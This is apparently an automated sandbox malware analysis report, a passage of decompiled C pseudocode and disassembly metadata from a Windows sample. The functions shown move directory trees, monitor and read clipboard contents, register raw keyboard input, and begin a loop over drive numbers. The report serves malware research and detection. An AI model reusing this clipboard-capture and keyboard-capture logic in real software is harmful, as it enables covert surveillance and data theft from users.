                                                                                  0x00406aca
                                                                                  0x00406acd
                                                                                  0x00406af2
                                                                                  0x00406af5
                                                                                  0x00406af8
                                                                                  0x00406afb
                                                                                  0x00406afe
                                                                                  0x00406b01
                                                                                  0x00406b26
                                                                                  0x00406b29
                                                                                  0x00406b34
                                                                                  0x00406b3f
                                                                                  0x00406b42
                                                                                  0x00406b4d
                                                                                  0x00406b58
                                                                                  0x00406b5b
                                                                                  0x00406b5e
                                                                                  0x00406b62
                                                                                  0x00406b69
                                                                                  0x00406b6f
                                                                                  0x00406b72
                                                                                  0x00406b75
                                                                                  0x00406b8c
                                                                                  0x00406b8f
                                                                                  0x00406b92
                                                                                  0x00406b95
                                                                                  0x00406ba6
                                                                                  0x00406ba9
                                                                                  0x00406bac
                                                                                  0x00406baf
                                                                                  0x00406bb2
                                                                                  0x00406bb5
                                                                                  0x00406bd4
                                                                                  0x00406bd7
                                                                                  0x00406bda
                                                                                  0x00406bdd
                                                                                  0x00406be0
                                                                                  0x00406be3
                                                                                  0x00406c08
                                                                                  0x00406c0b
                                                                                  0x00406c16
                                                                                  0x00406c21
                                                                                  0x00406c24
                                                                                  0x00406c2f
                                                                                  0x00406c3a
                                                                                  0x00406c3d
                                                                                  0x00406c40
                                                                                  0x00406c44
                                                                                  0x00406c4b
                                                                                  0x00406c51
                                                                                  0x00406c54
                                                                                  0x00406c57
                                                                                  0x00406c6e
                                                                                  0x00406c71
                                                                                  0x00406c74
                                                                                  0x00406c77
                                                                                  0x00406c88
                                                                                  0x00406c8b
                                                                                  0x00406c8e
                                                                                  0x00406c91
                                                                                  0x00406c94
                                                                                  0x00406c97
                                                                                  0x00406cb6
                                                                                  0x00406cb9
                                                                                  0x00406cbc
                                                                                  0x00406cbf
                                                                                  0x00406cc2
                                                                                  0x00406cc5
                                                                                  0x00406cea
                                                                                  0x00406ced
                                                                                  0x00406cf8
                                                                                  0x00406d03
                                                                                  0x00406d06
                                                                                  0x00406d11
                                                                                  0x00406d1c
                                                                                  0x00406d1f
                                                                                  0x00406d22
                                                                                  0x00406d26
                                                                                  0x00406d2d
                                                                                  0x00406d33
                                                                                  0x00406d36
                                                                                  0x00406d39
                                                                                  0x00406d50
                                                                                  0x00406d53
                                                                                  0x00406d56
                                                                                  0x00406d59
                                                                                  0x00406d6a
                                                                                  0x00406d6d
                                                                                  0x00406d70
                                                                                  0x00406d73
                                                                                  0x00406d76
                                                                                  0x00406d79
                                                                                  0x00406d98
                                                                                  0x00406d9b
                                                                                  0x00406d9e
                                                                                  0x00406da1
                                                                                  0x00406da4
                                                                                  0x00406da7
                                                                                  0x00406dcc
                                                                                  0x00406dcf
                                                                                  0x00406dda
                                                                                  0x00406de5
                                                                                  0x00406de8
                                                                                  0x00406df3
                                                                                  0x00406dfe
                                                                                  0x00406e01
                                                                                  0x00406e04
                                                                                  0x00406e08
                                                                                  0x00406e0f
                                                                                  0x00406e15
                                                                                  0x00406e18
                                                                                  0x00406e1b
                                                                                  0x00406e32
                                                                                  0x00406e35
                                                                                  0x00406e38
                                                                                  0x00406e3b
                                                                                  0x00406e4c
                                                                                  0x00406e4f
                                                                                  0x00406e52
                                                                                  0x00406e55
                                                                                  0x00406e58
                                                                                  0x00406e5b
                                                                                  0x00406e74
                                                                                  0x00406e77
                                                                                  0x00406e7a
                                                                                  0x00406e7d
                                                                                  0x00406e80
                                                                                  0x00406e83
                                                                                  0x00406ea8
                                                                                  0x00406eab
                                                                                  0x00406eb6
                                                                                  0x00406ec1
                                                                                  0x00406ec4
                                                                                  0x00406ecf
                                                                                  0x00406eda
                                                                                  0x00406edd
                                                                                  0x00406ee0
                                                                                  0x00406ee4
                                                                                  0x00406eeb
                                                                                  0x00406ef1
                                                                                  0x00406ef4
                                                                                  0x00406ef7
                                                                                  0x00406f0e
                                                                                  0x00406f11
                                                                                  0x00406f14
                                                                                  0x00406f17
                                                                                  0x00406f28
                                                                                  0x00406f2b
                                                                                  0x00406f2e
                                                                                  0x00406f31
                                                                                  0x00406f34
                                                                                  0x00406f37
                                                                                  0x00406f50
                                                                                  0x00406f53
                                                                                  0x00406f56
                                                                                  0x00406f59
                                                                                  0x00406f5c
                                                                                  0x00406f5f
                                                                                  0x00406f84
                                                                                  0x00406f87
                                                                                  0x00406f92
                                                                                  0x00406f9d
                                                                                  0x00406fa0
                                                                                  0x00406fab
                                                                                  0x00406fb6
                                                                                  0x00406fb9
                                                                                  0x00406fbc
                                                                                  0x00406fc0
                                                                                  0x00406fc7
                                                                                  0x00406fcd
                                                                                  0x00406fd0
                                                                                  0x00406fd3
                                                                                  0x00406fea
                                                                                  0x00406fed
                                                                                  0x00406ff0
                                                                                  0x00406ff3
                                                                                  0x00407004
                                                                                  0x00407007
                                                                                  0x0040700a
                                                                                  0x0040700d
                                                                                  0x00407010
                                                                                  0x00407013
                                                                                  0x0040702c
                                                                                  0x0040702f
                                                                                  0x00407032
                                                                                  0x00407035
                                                                                  0x00407038
                                                                                  0x0040703b
                                                                                  0x00407060
                                                                                  0x00407063
                                                                                  0x0040706e
                                                                                  0x00407079
                                                                                  0x0040707c
                                                                                  0x00407087
                                                                                  0x00407092
                                                                                  0x00407095
                                                                                  0x00407098
                                                                                  0x0040709c
                                                                                  0x004070a3
                                                                                  0x004070a9
                                                                                  0x004070ac
                                                                                  0x004070af
                                                                                  0x004070c6
                                                                                  0x004070c9
                                                                                  0x004070cc
                                                                                  0x004070cf
                                                                                  0x004070e0
                                                                                  0x004070e3
                                                                                  0x004070e6
                                                                                  0x004070e9
                                                                                  0x004070ec
                                                                                  0x004070ef
                                                                                  0x00407108
                                                                                  0x0040710b
                                                                                  0x0040710e
                                                                                  0x00407111
                                                                                  0x00407114
                                                                                  0x00407117
                                                                                  0x0040713c
                                                                                  0x0040713f
                                                                                  0x0040714a
                                                                                  0x00407155
                                                                                  0x00407158
                                                                                  0x00407163
                                                                                  0x0040716e
                                                                                  0x00407171
                                                                                  0x00407174
                                                                                  0x00407178
                                                                                  0x0040717f
                                                                                  0x00407185
                                                                                  0x00407188
                                                                                  0x0040718b
                                                                                  0x004071a2
                                                                                  0x004071a5
                                                                                  0x004071a8
                                                                                  0x004071ab
                                                                                  0x004071bc
                                                                                  0x004071bf
                                                                                  0x004071c2
                                                                                  0x004071c5
                                                                                  0x004071c8
                                                                                  0x004071cb
                                                                                  0x004071e4
                                                                                  0x004071e7
                                                                                  0x004071ea
                                                                                  0x004071ed
                                                                                  0x004071f0
                                                                                  0x004071f3
                                                                                  0x00407218
                                                                                  0x0040721b
                                                                                  0x00407226
                                                                                  0x00407231
                                                                                  0x00407234
                                                                                  0x0040723f
                                                                                  0x0040724a
                                                                                  0x0040724d
                                                                                  0x00407250
                                                                                  0x00407254
                                                                                  0x0040725b
                                                                                  0x00407261
                                                                                  0x00407264
                                                                                  0x00407267
                                                                                  0x0040727e
                                                                                  0x00407281
                                                                                  0x00407284
                                                                                  0x00407287
                                                                                  0x00407298
                                                                                  0x0040729b
                                                                                  0x0040729e
                                                                                  0x004072a1
                                                                                  0x004072a4
                                                                                  0x004072a7
                                                                                  0x004072c0
                                                                                  0x004072c3
                                                                                  0x004072c6
                                                                                  0x004072c9
                                                                                  0x004072cc
                                                                                  0x004072cf
                                                                                  0x004072f4
                                                                                  0x004072f7
                                                                                  0x00407302
                                                                                  0x0040730d
                                                                                  0x00407310
                                                                                  0x0040731b
                                                                                  0x00407326
                                                                                  0x00407329
                                                                                  0x0040732c
                                                                                  0x00407330
                                                                                  0x00407337
                                                                                  0x0040733d
                                                                                  0x00407340
                                                                                  0x00407343
                                                                                  0x0040735a
                                                                                  0x0040735d
                                                                                  0x00407360
                                                                                  0x00407363
                                                                                  0x00407374
                                                                                  0x00407377
                                                                                  0x0040737a
                                                                                  0x0040737d
                                                                                  0x00407380
                                                                                  0x00407383
                                                                                  0x0040739c
                                                                                  0x0040739f
                                                                                  0x004073a2
                                                                                  0x004073a5
                                                                                  0x004073a8
                                                                                  0x004073ab
                                                                                  0x004073d0
                                                                                  0x004073d3
                                                                                  0x004073de
                                                                                  0x004073e9
                                                                                  0x004073ec
                                                                                  0x004073f7
                                                                                  0x00407402
                                                                                  0x00407405
                                                                                  0x00407408
                                                                                  0x0040740c
                                                                                  0x00407413
                                                                                  0x00407419
                                                                                  0x0040741c
                                                                                  0x0040741f
                                                                                  0x00407436
                                                                                  0x00407439
                                                                                  0x0040743c
                                                                                  0x0040743f
                                                                                  0x00407450
                                                                                  0x00407453
                                                                                  0x00407456
                                                                                  0x00407459
                                                                                  0x0040745c
                                                                                  0x0040745f
                                                                                  0x00407478
                                                                                  0x0040747b
                                                                                  0x0040747e
                                                                                  0x00407481
                                                                                  0x00407484
                                                                                  0x00407487
                                                                                  0x004074ac
                                                                                  0x004074af
                                                                                  0x004074ba
                                                                                  0x004074c5
                                                                                  0x004074c8
                                                                                  0x004074d3
                                                                                  0x004074de
                                                                                  0x004074e1
                                                                                  0x004074e4
                                                                                  0x004074e8
                                                                                  0x004074ef
                                                                                  0x004074f5
                                                                                  0x004074f8
                                                                                  0x004074fb
                                                                                  0x00407512
                                                                                  0x00407515
                                                                                  0x00407518
                                                                                  0x0040751b
                                                                                  0x0040752c
                                                                                  0x0040752f
                                                                                  0x00407532
                                                                                  0x00407535
                                                                                  0x00407538
                                                                                  0x0040753b
                                                                                  0x00407554
                                                                                  0x00407557
                                                                                  0x0040755a
                                                                                  0x0040755d
                                                                                  0x00407560
                                                                                  0x00407563
                                                                                  0x00407588
                                                                                  0x0040758b
                                                                                  0x00407596
                                                                                  0x004075a1
                                                                                  0x004075a4
                                                                                  0x004075af
                                                                                  0x004075ba
                                                                                  0x004075bd
                                                                                  0x004075c0
                                                                                  0x004075c4
                                                                                  0x004075cb
                                                                                  0x004075d1
                                                                                  0x004075d4
                                                                                  0x004075d7
                                                                                  0x004075ee
                                                                                  0x004075f1
                                                                                  0x004075f4
                                                                                  0x004075f7
                                                                                  0x00407608
                                                                                  0x0040760b
                                                                                  0x0040760e
                                                                                  0x00407611
                                                                                  0x00407614
                                                                                  0x00407617
                                                                                  0x00407630
                                                                                  0x00407633
                                                                                  0x00407636
                                                                                  0x00407639
                                                                                  0x0040763c
                                                                                  0x0040763f
                                                                                  0x00407664
                                                                                  0x00407667
                                                                                  0x00407672
                                                                                  0x0040767d
                                                                                  0x00407680
                                                                                  0x0040768b
                                                                                  0x00407696
                                                                                  0x00407699
                                                                                  0x0040769c
                                                                                  0x004076a0
                                                                                  0x004076a7
                                                                                  0x004076ad
                                                                                  0x004076b0
                                                                                  0x004076b3
                                                                                  0x004076ca
                                                                                  0x004076cd
                                                                                  0x004076d0
                                                                                  0x004076d3
                                                                                  0x004076e4
                                                                                  0x004076e7
                                                                                  0x004076ea
                                                                                  0x004076ed
                                                                                  0x004076f0
                                                                                  0x004076f3
                                                                                  0x0040770c
                                                                                  0x0040770f
                                                                                  0x00407712
                                                                                  0x00407715
                                                                                  0x00407718
                                                                                  0x0040771b
                                                                                  0x0040773a
                                                                                  0x0040773d
                                                                                  0x00407748
                                                                                  0x00407753
                                                                                  0x00407756
                                                                                  0x00407761
                                                                                  0x0040776c
                                                                                  0x0040776f
                                                                                  0x00407772
                                                                                  0x00407776
                                                                                  0x00407782
                                                                                  0x00407793
                                                                                  0x004077a8
                                                                                  0x004077b2
                                                                                  0x004077b5
                                                                                  0x004077be
                                                                                  0x00000000
                                                                                  0x004077be
                                                                                  0x004077c6
                                                                                  0x004077cb
                                                                                  0x00000000
                                                                                  0x004077cb

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl_aullshr
                                                                                  • String ID:
                                                                                  • API String ID: 673498613-0
                                                                                  • Opcode ID: baaf79d8cfe51c2f24e4720d5aa813661035a3ea984344c320599f23fcf2e78b
                                                                                  • Instruction ID: 342a6486b9e8001f08a7bf27c7bc9eacaf831c291761ffc9c0f51bc504639bdc
                                                                                  • Opcode Fuzzy Hash: baaf79d8cfe51c2f24e4720d5aa813661035a3ea984344c320599f23fcf2e78b
                                                                                  • Instruction Fuzzy Hash: 17D22D79D11619EFCB54CF99C18099EFBF1FF88320F62859A9845AB305C630AE95DF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 434 404a90-404adf CreateDirectoryW wsprintfW FindFirstFileW 435 404ae5-404af9 lstrcmpW 434->435 436 404bbf-404bc2 434->436 437 404b11 435->437 438 404afb-404b0f lstrcmpW 435->438 440 404b8c-404ba2 FindNextFileW 437->440 438->437 439 404b13-404b5c wsprintfW * 2 438->439 441 404b76-404b86 MoveFileExW 439->441 442 404b5e-404b74 call 404a90 439->442 440->435 443 404ba8-404bb9 FindClose RemoveDirectoryW 440->443 441->440 442->440 443->436
                                                                                  C-Code - Quality: 100%
                                                                                  			E00404A90(WCHAR* _a4, char _a8) {
                                                                                  				short _v524;
                                                                                  				struct _WIN32_FIND_DATAW _v1116;
                                                                                  				void* _v1120;
                                                                                  				short _v1644;
                                                                                  				short _v2164;
                                                                                  				void* _t29;
                                                                                  				void* _t60;
                                                                                  				void* _t61;
                                                                                  
                                                                                  				_t1 =  &_a8; // 0x40505b
                                                                                  				CreateDirectoryW( *_t1, 0);
                                                                                  				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                  				_t61 = _t60 + 0xc;
                                                                                  				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                  				_v1120 = _t29;
                                                                                  				if(_v1120 == 0xffffffff) {
                                                                                  					return _t29;
                                                                                  				} else {
                                                                                  					goto L1;
                                                                                  				}
                                                                                  				do {
                                                                                  					L1:
                                                                                  					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                  						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                  						_t14 =  &_a8; // 0x40505b
                                                                                  						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                  						_t61 = _t61 + 0x20;
                                                                                  						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                  							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                  						} else {
                                                                                  							E00404A90( &_v1644,  &_v2164);
                                                                                  							_t61 = _t61 + 8;
                                                                                  						}
                                                                                  					}
                                                                                  				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                  				FindClose(_v1120);
                                                                                  				return RemoveDirectoryW(_a4);
                                                                                  			}











                                                                                  0x00404a9b
                                                                                  0x00404a9f
                                                                                  0x00404ab5
                                                                                  0x00404abb
                                                                                  0x00404acc
                                                                                  0x00404ad2
                                                                                  0x00404adf
                                                                                  0x00404bc2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404ae5
                                                                                  0x00404ae5
                                                                                  0x00404af9
                                                                                  0x00404b2a
                                                                                  0x00404b3a
                                                                                  0x00404b4a
                                                                                  0x00404b50
                                                                                  0x00404b5c
                                                                                  0x00404b86
                                                                                  0x00404b5e
                                                                                  0x00404b6c
                                                                                  0x00404b71
                                                                                  0x00404b71
                                                                                  0x00404b5c
                                                                                  0x00404ba0
                                                                                  0x00404baf
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNEL32([P@,00000000), ref: 00404A9F
                                                                                  • wsprintfW.USER32 ref: 00404AB5
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00404ACC
                                                                                  • lstrcmpW.KERNEL32(?,00411594), ref: 00404AF1
                                                                                  • lstrcmpW.KERNEL32(?,00411598), ref: 00404B07
                                                                                  • wsprintfW.USER32 ref: 00404B2A
                                                                                  • wsprintfW.USER32 ref: 00404B4A
                                                                                  • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404B86
                                                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00404B9A
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00404BAF
                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00404BB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                  • String ID: %s\%s$%s\%s$%s\*$[P@
                                                                                  • API String ID: 92872011-505645206
                                                                                  • Opcode ID: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction ID: 4312a352e9e7f9f4b9df3eadcbdfd99b35f9a62cedde5f9254868b67503f5fd5
                                                                                  • Opcode Fuzzy Hash: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction Fuzzy Hash: 5D3178B5900218ABCB10DBA0DC88FEA7778AB88311F40C599F709A7155DB75EAC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 446 403db0-403dd2 GetWindowLongW 447 403dd4-403ddb 446->447 448 403df6-403dfd 446->448 449 403de1-403de5 447->449 450 403e67-403e78 IsClipboardFormatAvailable 447->450 451 403e26-403e2c 448->451 452 403dff 448->452 455 403e04-403e21 SetClipboardViewer SetWindowLongW 449->455 456 403de7-403deb 449->456 453 403e83-403e8d IsClipboardFormatAvailable 450->453 454 403e7a-403e81 450->454 458 403e46-403e4a 451->458 459 403e2e-403e44 SetWindowLongW 451->459 457 403fe4-403ffd DefWindowProcA 452->457 461 403e98-403ea2 IsClipboardFormatAvailable 453->461 462 403e8f-403e96 453->462 460 403eab-403eaf 454->460 455->457 463 403df1 456->463 464 403f9d-403fde RegisterRawInputDevices ChangeClipboardChain 456->464 465 403e62 458->465 466 403e4c-403e5c SendMessageA 458->466 459->465 468 403eb5-403ebf OpenClipboard 460->468 469 403f7f-403f83 460->469 461->460 467 403ea4 461->467 462->460 463->457 464->457 465->457 466->465 467->460 468->469 472 403ec5-403ed6 GetClipboardData 468->472 470 403f85-403f95 SendMessageA 469->470 471 403f9b 469->471 470->471 471->457 473 403ed8 472->473 474 403edd-403eee GlobalLock 472->474 473->457 475 403ef0 474->475 476 403ef5-403f06 474->476 475->457 477 403f08-403f0c 476->477 478 403f29-403f3c call 40b570 476->478 480 403f3e-403f4e call 403ce0 477->480 481 403f0e-403f12 477->481 486 403f51-403f65 GlobalUnlock CloseClipboard 478->486 480->486 482 403f14 481->482 483 403f16-403f27 call 403bd0 481->483 482->486 483->486 486->469 490 403f67-403f7c call 403480 call 408fb0 486->490 490->469
                                                                                  C-Code - Quality: 94%
                                                                                  			E00403DB0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
                                                                                  				struct HWND__* _v8;
                                                                                  				int _v12;
                                                                                  				struct HWND__* _v16;
                                                                                  				void* _v20;
                                                                                  				void* _v24;
                                                                                  				short _v26;
                                                                                  				short _v30;
                                                                                  				int _v32;
                                                                                  				short _v34;
                                                                                  				char _v36;
                                                                                  				int _v40;
                                                                                  				int _v44;
                                                                                  				struct HWND__* _t90;
                                                                                  				struct HWND__* _t97;
                                                                                  				struct HWND__* _t98;
                                                                                  				void* _t129;
                                                                                  
                                                                                  				_v8 = GetWindowLongW(_a4, 0xffffffeb);
                                                                                  				_v40 = _a8;
                                                                                  				if(_v40 > 0x308) {
                                                                                  					if(_v40 == 0x30d) {
                                                                                  						if(_a12 != _v8) {
                                                                                  							if(_v8 != 0) {
                                                                                  								SendMessageA(_v8, _a8, _a12, _a16);
                                                                                  							}
                                                                                  						} else {
                                                                                  							_v8 = _a16;
                                                                                  							SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                  						}
                                                                                  						goto L38;
                                                                                  					} else {
                                                                                  						L38:
                                                                                  						return DefWindowProcA(_a4, _a8, _a12, _a16);
                                                                                  					}
                                                                                  				}
                                                                                  				if(_v40 == 0x308) {
                                                                                  					_v12 = 0;
                                                                                  					if(IsClipboardFormatAvailable(0xd) == 0) {
                                                                                  						if(IsClipboardFormatAvailable(1) == 0) {
                                                                                  							if(IsClipboardFormatAvailable(7) != 0) {
                                                                                  								_v12 = 7;
                                                                                  							}
                                                                                  						} else {
                                                                                  							_v12 = 1;
                                                                                  						}
                                                                                  					} else {
                                                                                  						_v12 = 0xd;
                                                                                  					}
                                                                                  					if(_v12 == 0 || OpenClipboard(0) == 0) {
                                                                                  						L34:
                                                                                  						if(_v8 != 0) {
                                                                                  							SendMessageA(_v8, _a8, _a12, _a16);
                                                                                  						}
                                                                                  					} else {
                                                                                  						_v24 = GetClipboardData(_v12);
                                                                                  						if(_v24 != 0) {
                                                                                  							_v20 = GlobalLock(_v24);
                                                                                  							if(_v20 != 0) {
                                                                                  								_v16 = 0;
                                                                                  								_v44 = _v12;
                                                                                  								if(_v44 == 1) {
                                                                                  									_t90 = E0040B570(_v20, 0, 0);
                                                                                  									_t129 = _t129 + 0xc;
                                                                                  									_v16 = _t90;
                                                                                  								} else {
                                                                                  									if(_v44 == 7) {
                                                                                  										_t97 = E00403CE0(_v20, 0, 0);
                                                                                  										_t129 = _t129 + 0xc;
                                                                                  										_v16 = _t97;
                                                                                  									} else {
                                                                                  										if(_v44 == 0xd) {
                                                                                  											_t98 = E00403BD0(_v20, _v20, 0);
                                                                                  											_t129 = _t129 + 8;
                                                                                  											_v16 = _t98;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								GlobalUnlock(_v24);
                                                                                  								CloseClipboard();
                                                                                  								if(_v16 != 0) {
                                                                                  									E00403480(_v16);
                                                                                  									E00408FB0(_v16);
                                                                                  								}
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							goto L38;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L38;
                                                                                  				}
                                                                                  				if(_v40 == 1) {
                                                                                  					_v8 = SetClipboardViewer(_a4);
                                                                                  					SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                  				} else {
                                                                                  					if(_v40 == 2) {
                                                                                  						_v36 = 0;
                                                                                  						_v34 = 0;
                                                                                  						_v30 = 0;
                                                                                  						_v26 = 0;
                                                                                  						_v36 = 1;
                                                                                  						_v34 = 6;
                                                                                  						_v32 = 1;
                                                                                  						__imp__RegisterRawInputDevices( &_v36, 1, 0xc);
                                                                                  						ChangeClipboardChain(_a4, _v8);
                                                                                  					}
                                                                                  				}
                                                                                  				goto L38;
                                                                                  			}



















                                                                                  0x00403dc2
                                                                                  0x00403dc8
                                                                                  0x00403dd2
                                                                                  0x00403dfd
                                                                                  0x00403e2c
                                                                                  0x00403e4a
                                                                                  0x00403e5c
                                                                                  0x00403e5c
                                                                                  0x00403e2e
                                                                                  0x00403e31
                                                                                  0x00403e3e
                                                                                  0x00403e3e
                                                                                  0x00000000
                                                                                  0x00403dff
                                                                                  0x00403fe4
                                                                                  0x00403ffd
                                                                                  0x00403ffd
                                                                                  0x00403dfd
                                                                                  0x00403ddb
                                                                                  0x00403e67
                                                                                  0x00403e78
                                                                                  0x00403e8d
                                                                                  0x00403ea2
                                                                                  0x00403ea4
                                                                                  0x00403ea4
                                                                                  0x00403e8f
                                                                                  0x00403e8f
                                                                                  0x00403e8f
                                                                                  0x00403e7a
                                                                                  0x00403e7a
                                                                                  0x00403e7a
                                                                                  0x00403eaf
                                                                                  0x00403f7f
                                                                                  0x00403f83
                                                                                  0x00403f95
                                                                                  0x00403f95
                                                                                  0x00403ec5
                                                                                  0x00403ecf
                                                                                  0x00403ed6
                                                                                  0x00403ee7
                                                                                  0x00403eee
                                                                                  0x00403ef5
                                                                                  0x00403eff
                                                                                  0x00403f06
                                                                                  0x00403f31
                                                                                  0x00403f36
                                                                                  0x00403f39
                                                                                  0x00403f08
                                                                                  0x00403f0c
                                                                                  0x00403f46
                                                                                  0x00403f4b
                                                                                  0x00403f4e
                                                                                  0x00403f0e
                                                                                  0x00403f12
                                                                                  0x00403f1c
                                                                                  0x00403f21
                                                                                  0x00403f24
                                                                                  0x00403f24
                                                                                  0x00403f12
                                                                                  0x00403f0c
                                                                                  0x00403f55
                                                                                  0x00403f5b
                                                                                  0x00403f65
                                                                                  0x00403f6b
                                                                                  0x00403f77
                                                                                  0x00403f7c
                                                                                  0x00000000
                                                                                  0x00403f65
                                                                                  0x00000000
                                                                                  0x00403ef0
                                                                                  0x00403ed8
                                                                                  0x00000000
                                                                                  0x00403eaf
                                                                                  0x00403de5
                                                                                  0x00403e0e
                                                                                  0x00403e1b
                                                                                  0x00403de7
                                                                                  0x00403deb
                                                                                  0x00403f9f
                                                                                  0x00403fa5
                                                                                  0x00403fa8
                                                                                  0x00403fab
                                                                                  0x00403fb4
                                                                                  0x00403fbd
                                                                                  0x00403fc1
                                                                                  0x00403fd0
                                                                                  0x00403fde
                                                                                  0x00403fde
                                                                                  0x00403deb
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DBC
                                                                                  • SetClipboardViewer.USER32(?), ref: 00403E08
                                                                                  • SetWindowLongW.USER32 ref: 00403E1B
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00403E70
                                                                                  • OpenClipboard.USER32(00000000), ref: 00403EB7
                                                                                  • GetClipboardData.USER32 ref: 00403EC9
                                                                                  • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00403FD0
                                                                                  • ChangeClipboardChain.USER32(?,?), ref: 00403FDE
                                                                                  • DefWindowProcA.USER32(?,?,?,?), ref: 00403FF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                  • String ID:
                                                                                  • API String ID: 3549449529-0
                                                                                  • Opcode ID: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction ID: 0016380ad0389118889d1cf690c65c1d7a98e8f3a274b3db5f7ad41e70fd50c0
                                                                                  • Opcode Fuzzy Hash: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction Fuzzy Hash: B3713D75D00209EFDB14DFA4D848BEEBBB8BF48306F14852AF505B6290D7799B40CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 50%
                                                                                  			E004050B0() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				short _v24;
                                                                                  				short _v556;
                                                                                  				short _v2604;
                                                                                  				intOrPtr _v2608;
                                                                                  				union _ULARGE_INTEGER _v2612;
                                                                                  				long _v2616;
                                                                                  				short _v3148;
                                                                                  				intOrPtr _v3152;
                                                                                  				intOrPtr _t34;
                                                                                  				intOrPtr _t38;
                                                                                  				struct %anon54 _t43;
                                                                                  				intOrPtr _t63;
                                                                                  				void* _t68;
                                                                                  				void* _t69;
                                                                                  				void* _t70;
                                                                                  
                                                                                  				Sleep(0x3e8);
                                                                                  				GetModuleFileNameW(0, 0x414418, 0x104);
                                                                                  				_t34 = E0040D530(0x414418);
                                                                                  				_t69 = _t68 + 4;
                                                                                  				 *0x414410 = _t34;
                                                                                  				while(1 != 0) {
                                                                                  					_v8 = E004048C0();
                                                                                  					_v12 = 2;
                                                                                  					while(_v12 <= 0x19) {
                                                                                  						_t38 = E00404860(_v8, _v12,  &_v24);
